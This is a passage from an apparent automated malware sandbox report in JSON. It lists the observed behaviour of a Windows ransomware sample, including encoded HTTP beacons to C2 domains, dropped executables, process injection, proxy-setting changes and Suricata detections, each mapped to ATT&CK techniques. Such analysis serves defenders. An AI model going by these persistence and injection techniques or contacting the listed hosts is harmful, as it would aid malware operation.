emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"ee32c115\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"Keep\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"f8b57a425714546c965f91b67aa30a59\" in header \"GET /88/452.html HTTP/1.1From: 133833046141054708Via: emohgso\\sgt>558`apfc>7\\qcpbo;32.1213`mt?423/_mcz?04g37g_g;722166`ee32c115`4;11432Host: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832908|1738832899|4|2|0; snkz=<IPv4>\"\n Contains base64 string in header \"/619/651\" in header \"GET /619/651.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /619/651.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /619/651.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"g56f1gd49ead9278\" in header \"GET /619/651.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /619/651.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/883/315\" in header \"GET /883/315.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\"\n Contains base64 string in header \"html\" in header \"GET /883/315.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\"\n Contains base64 string in header \"8/23\" in header \"GET /883/315.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\"\n Contains base64 string in header \"g56f1gd49ead9278\" in header \"GET /883/315.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\"\n Contains base64 string in header \"Keep\" in header \"GET /883/315.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\"\n Contains base64 string in header \"f8b57a425714546c965f91b67aa30a59\" in header \"GET /883/315.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>ha4:37;.:g56f1gd49ead9278.bca28bHost: ow5dirasuek.comConnection: Keep-AliveCookie: btst=f8b57a425714546c965f91b67aa30a59|<IPv4>|1738832914|1738832899|5|3|0; snkz=<IPv4>\"\n Contains base64 string in header \"html\" in header \"GET /22/867.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>56g;638/1:_c35c7a9f0c87ghaf41:6a_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /22/867.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>56g;638/1:_c35c7a9f0c87ghaf41:6a_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /22/867.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>56g;638/1:_c35c7a9f0c87ghaf41:6a_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/506/903\" in header \"GET /506/903.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>4cg809417c24h/6f.97038b2f5b22b;6_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /506/903.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>4cg809417c24h/6f.97038b2f5b22b;6_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /506/903.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>4cg809417c24h/6f.97038b2f5b22b;6_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"4cg809417c24h/6f\" in header \"GET /506/903.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>4cg809417c24h/6f.97038b2f5b22b;6_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /506/903.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>4cg809417c24h/6f.97038b2f5b22b;6_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /881/70.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d6dg.:;55g68:4b81d92451c759d238__pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /881/70.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d6dg.:;55g68:4b81d92451c759d238__pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"d6dg\" in header \"GET /881/70.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d6dg.:;55g68:4b81d92451c759d238__pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /881/70.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d6dg.:;55g68:4b81d92451c759d238__pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"fbg7\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"34c7g37163gg\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"fg4g\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"6g5c\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /91/622.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>e6:fbg7.9;34c7g37163gg.fg4g;6g5c_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/922/654\" in header \"GET /922/654.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>h67haed7b9/:2`6c1:;0::2fhdc47:h._pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /922/654.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>h67haed7b9/:2`6c1:;0::2fhdc47:h._pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /922/654.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>h67haed7b9/:2`6c1:;0::2fhdc47:h._pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /922/654.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>h67haed7b9/:2`6c1:;0::2fhdc47:h._pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /851/52.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>2/56c242c:3fg_c7/d2b965g72bfaf5b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /851/52.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>2/56c242c:3fg_c7/d2b965g72bfaf5b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /851/52.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>2/56c242c:3fg_c7/d2b965g72bfaf5b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /683/84.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>867:2ee1b3bg614gdg:`6:a9771246;1_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /683/84.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>867:2ee1b3bg614gdg:`6:a9771246;1_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"a9771246\" in header \"GET /683/84.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>867:2ee1b3bg614gdg:`6:a9771246;1_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /683/84.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>867:2ee1b3bg614gdg:`6:a9771246;1_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/514/116\" in header \"GET /514/116.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>62bc6g8c2603e127/ec1b4434b5814fc_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /514/116.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>62bc6g8c2603e127/ec1b4434b5814fc_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /514/116.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>62bc6g8c2603e127/ec1b4434b5814fc_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"62bc6g8c2603e127/ec1b4434b5814fc\" in header \"GET /514/116.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>62bc6g8c2603e127/ec1b4434b5814fc_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /514/116.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>62bc6g8c2603e127/ec1b4434b5814fc_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/349/128\" in header \"GET /349/128.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>7b2f2b:6cdbgc4e:55;c76`59db218g5_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /349/128.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>7b2f2b:6cdbgc4e:55;c76`59db218g5_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /349/128.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>7b2f2b:6cdbgc4e:55;c76`59db218g5_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"6cdbgc4e\" in header \"GET /349/128.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>7b2f2b:6cdbgc4e:55;c76`59db218g5_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /349/128.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>7b2f2b:6cdbgc4e:55;c76`59db218g5_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/949/928\" in header \"GET /949/928.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d146789_:c`ge553c6;4e3b94b6c4c97_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /949/928.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d146789_:c`ge553c6;4e3b94b6c4c97_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /949/928.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d146789_:c`ge553c6;4e3b94b6c4c97_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /949/928.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>d146789_:c`ge553c6;4e3b94b6c4c97_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"/968/369\" in header \"GET /968/369.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>6147bge`2f77259fab6.28.5f5:9`39b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"html\" in header \"GET /968/369.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>6147bge`2f77259fab6.28.5f5:9`39b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"8/23\" in header \"GET /968/369.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>6147bge`2f77259fab6.28.5f5:9`39b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"\n Contains base64 string in header \"Keep\" in header \"GET /968/369.html HTTP/1.1From: 133833046141054708Via: lmc`pfx;495_qq>8/23\\lgw>6147bge`2f77259fab6.28.5f5:9`39b_pmdtwqvHost: mkkuei4kdsz.comConnection: Keep-Alive\"", "origin": "Network Traffic", "attck_id": "T1132", "attck_id_wiki": "https://attack.mitre.org/techniques/T1132"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-173", "type": 3, "relevance": 1, "name": "Queries services related registry keys", "description": "\"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\PARAMETERS\"; Key: \"TRANSPORTS\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAPPING\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK\\SETUP MIGRATION\\PROVIDERS\\TCPIP6\"; Key: \"WINSOCK 2.0 PROVIDER ID\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MINSOCKADDRLENGTH\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"MAXSOCKADDRLENGTH\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"USEDELAYEDACCEPTANCE\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP6\\PARAMETERS\\WINSOCK\"; Key: \"HELPERDLLNAME\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"WINSOCK_REGISTRY_VERSION\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\"; Key: \"NAMESPACE_CALLOUT\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"SERIAL_ACCESS_NUM\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NEXT_CATALOG_ENTRY_ID\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\"; Key: \"NUM_CATALOG_ENTRIES\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000001\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000002\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000003\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")\n \"ewiuer2.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\WINSOCK2\\PARAMETERS\\PROTOCOL_CATALOG9\\CATALOG_ENTRIES\\000000000004\"; Key: \"PACKEDCATALOGITEM\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1007", "attck_id_wiki": "https://attack.mitre.org/techniques/T1007"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "api-37", "type": 6, "relevance": 10, "name": "Opens the Kernel Security Device Driver (KsecDD) of Windows", "description": "\"ewiuer2.exe\" opened \"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "System Security", "identifier": "registry-67", "type": 3, "relevance": 10, "name": "Creates or modifies windows services", "description": "\"ewiuer2.exe\" (Access type: \"CREATE\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\SERVICES\\TCPIP\\PARAMETERS\")", "origin": "Registry Access", "attck_id": "T1543.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "binary-1", "type": 8, "relevance": 10, "name": "Drops executable files", "description": "\"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%APPDATA%\\ewiuer2.exe]- [targetUID: 00000000-00004444]\n \"EWIUER2.EXE.67A482B6.bin\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- [targetUID: N/A]\n \"ewiuer2.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%WINDIR%\\System32\\ewiuer2.exe]- [targetUID: 00000000-00004444]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" wrote 63049 bytes starting with PE header signature to file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...\n \"ewiuer2.exe\" wrote 63049 bytes starting with PE header signature to file \"C:\\Windows\\System32\\ewiuer2.exe\": 4d5aff000300000004000000ffff0000ff00000000000000400000000000000000000000000000000000000000000000000000000000000000000000ff0000000e1fff0e00ff09ff21ff014cff21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "registry-9", "type": 3, "relevance": 7, "name": "Checks warning level of secure to non-secure traffic redirection", "description": "\"ewiuer2.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"WARNONHTTPSTOHTTPREDIRECT\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "network-23", "type": 7, "relevance": 5, "name": "Sends traffic on typical HTTP outbound port, but without HTTP header", "description": "TCP traffic to <IPv4> on port 80 is sent without HTTP header\n TCP traffic to <IPv4> on port 80 is sent without HTTP header", "origin": "Network Traffic", "attck_id": "T1071.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "registry-27", "type": 3, "relevance": 10, "name": "Modifies proxy settings", "description": "\"ewiuer2.exe\" (Access type: \"SETVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYENABLE\"; Value: \"00000000\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYSERVER\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\"; Key: \"PROXYOVERRIDE\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")\n \"ewiuer2.exe\" (Access type: \"DELETEVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\INTERNET SETTINGS\\ZONEMAP\"; Key: \"PROXYBYPASS\")", "origin": "Registry Access", "attck_id": "T1112", "attck_id_wiki": "https://attack.mitre.org/techniques/T1112"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\" (Handle: 160)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\" (Handle: 160)\n \"ecc618e36c19c2986389dfd687efb10cbfde125cf66fef09f7fad4cbc63d7cda.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\ewiuer2.exe\" (Handle: 160)\n \"ewiuer2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 728)\n \"ewiuer2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 728)\n \"ewiuer2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 728)\n \"ewiuer2.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 576)\n \"ewiuer2.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 576)\n \"ewiuer2.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\ewiuer2.exe\" (Handle: 576)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"ewiuer2.exe\" allocated memory in \"%WINDIR%\\System32\\ewiuer2.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "suricata-2", "type": 18, "relevance": 10, "name": "Detected Suricata Alert", "description": "Detected alert \"ET MALWARE Ransom.Win32.Birele.gsg Checkin\" (SID: 2015786, Rev: 7, Severity: 1) categorized as \"Malware Command and Control Activity Detected\" (PUA/PUP/Adware)\n Detected alert \"ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst\" (SID: 2037771, Rev: 2, Severity: 1) categorized as \"A Network Trojan was detected\" (PUA/PUP/Adware)\n Detected alert \"ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz\" (SID: 2018141, Rev: 6, Severity: 1) categorized as \"A Network Trojan was detected\" (PUA/PUP/Adware)", "origin": "Suricata 